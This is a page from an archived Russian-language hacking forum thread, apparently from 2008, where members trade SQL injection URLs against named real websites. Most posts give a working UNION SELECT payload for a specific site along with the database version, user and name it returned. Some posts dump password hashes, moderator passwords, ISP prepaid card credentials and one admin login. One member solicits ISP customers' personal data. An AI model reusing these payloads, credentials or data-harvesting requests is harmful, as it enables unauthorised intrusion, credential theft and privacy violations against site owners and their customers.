ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
Страница 680 из 1242 « Первая < 180580630670 676 677 678 679 680 681 682 683 684 6907307801180 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #6791  
Старый 06.11.2008, 17:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
http://biz-registr.com.ua/?ct=-6+union+select+1,2,3,4,5,6,7,8,9/*
u_bizregistr@localhost

login: enter
passw: embrace
админка: _http://biz-registr.com.ua/admin/
 

  #6792  
Старый 06.11.2008, 22:31
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
http://www.lanck.ru/index.php?act=cat&div=100+union+select+1,concat( user(), 0x3a,version(),0x3a,database()),3,4,5,6,7,8/*

msklanck_mainsql@localhost:
4.0.23a-log:
db_msklanck_mainsql

Snap : Походу одни и теже делают сайты
 

  #6793  
Старый 06.11.2008, 22:45
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
В общем мега разработчики http://www.5d.ru/

Все их основные проекты в основном по одному сценарию в параметре ошибка

http://www.bladeserver.ru/?act=news&id=7+union+select+1,concat( user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8,9/*

blade@zvm14.host.ru
4.0.27-log
blade
 

  #6794  
Старый 07.11.2008, 07:48
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
хренасе итаРРТАС -)

http://www.itartass.ur.ru/news/?id=40914+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13/*


Версия 5.0.22-standard
Юзер itartass@localhost
Датабейс itartass
 

  #6795  
Старый 07.11.2008, 11:23
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
www.mini-ats.ru, тИЦ=20

Код:
http://www.mini-ats.ru/ats.php?idc=-1%27+union+select+111,unhex(hex(concat(version(),':',user(),':',database()))),333,444,555,666/*
version() - 5.0.18-debug-log
user() - mats@localhost
database() - mats

похоже там был форум IPB но ссылка на него с главной страницы ведет в никуда(404)
Зато все его таблицы есть в БД. Логины и соленые хэши юзеров(бывших) вытаскиваются такой длинной инъекцией:


Код:
http://www.mini-ats.ru/ats.php?idc=-1'+union+select+111,concat(converge_id,':',unhex(hex(name)),':',unhex(hex(converge_pass_hash)),':',unhex(hex(converge_pass_salt))),333,444,555,666+from+ipb_members_converge,ipb_members+where+converge_id=id+limit+0,1/*

можно предположить что какой-то из этих пассов подойдет к админке c базовой авторизацией
www.mini-ats.ru/admin

-----------------------------------------------------

www.lnet.ru, тИЦ=110

Код:
http://www.lnet.ru/list.php?tid=-1+union+select+1,version(),3,4,5,user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20--
version() - 5.0.22
database() - bvpru_textov
user() - bvpru_textov@localhost

здесь есть масса таблиц с порнотекстами, что не может не радовать, но есть и таблицы с чем-то напоминающим пароли:
autors
autors3
system_user

этими инъекциями можно просмотреть их содержимое

Код:
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors3+limit+0,1--
http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(id,char(0x3A),login,char(0x3A),password,char(0x3A),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+system_user+limit+0,1--
здесь есть формы для входа
http://www.lnet.ru/admin.php
http://www.lnet.ru/autor.php

-----------------------------------------------------

7vbf.info, тИЦ=10

Код:
http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database())--
version() - 5.0.51a-15
user() - web22_u1@localhost
database() - web22_db1

в таблице moderator есть поля pass и cod.
может там еще какие таблицы есть интересные, но по их названиям так не скажешь

Код:
http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(login,char(0x3A),pass,char(0x3A),cod)+from+moderator+limit+0,1--
-----------------------------------------------------

www.smaster.ru, тИЦ=80

Код:
http://www.smaster.ru/next/index.php?pid=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database()),2,3,4,5/*
version() - 4.1.22-log
database() - smaster@localhost
user() - wwwsmasterru
 

Интернет провайдер г. Кировоград
  #6796  
Старый 08.11.2008, 00:02
FNS
Новичок
Регистрация: 07.11.2008
Сообщений: 17
Провел на форуме:
51589

Репутация: 55
Отправить сообщение для FNS с помощью ICQ
По умолчанию Интернет провайдер г. Кировоград
Данные интернет карточек:
Код:
http://www.romb.net/topics/other/?id=-70+union+select+concat_ws(0x3a,CardID,SerialNo,CardUserName,CardPasswd,SeriesID,Active,AccNo,LocationID,SellingDate,SellingAdmin,SellingIP,Discount,FreeBonus,Amount,Entered,SaleRecID)+from+ispbilling.TblPasswdCards+limit+1,1--
Админки не нашел...
 

  #6797  
Старый 08.11.2008, 05:44
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Интернет магазин агенства Десси

http://www.dessy.ru/cgi-bin/shop.cgi?do=wholepage&id=-20/**/union/**/select/**/1, 2,3,version(),database(),6,user(),8,9,10, 11,12,13,14,15,16,17,18,19,20,21--


5.0.67-log
dessyru@10.10.10.220
dessyru
 

  #6798  
Старый 08.11.2008, 06:06
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Интернет магазин 100 Пудов

http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/union/**/select/**/1,2, 3,version(),user(), database(),7,8,9,10,11,12,13--

zakazkr_zakaz@localhost
5.0.45-log
zakazkr_zakaz
 

  #6799  
Старый 08.11.2008, 06:15
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию
Оффтоп:
Ребят, вижу тут пошли взломы провайдеров, убедительная просьба по возможности скидывайте данные о клиентах (телефон, номер договора, ФИО) мне в ЛС. Если вас конечно не затруднит.
 

  #6800  
Старый 08.11.2008, 06:18
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Новостной портал.
Вроде бы всё прикрыто но опять же все данные смотрим внутри странички галлереи -)

http://kirovograd.rks.kr.ua/photo/gorod/monuments/photo00+ union+select+ database(),version(),user(),4--/

rkskru_rks@localhost
5.0.45-log-3
rkskru_rks
 
 
Страница 680 из 1242 « Первая < 180580630670 676 677 678 679 680 681 682 683 684 6907307801180 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ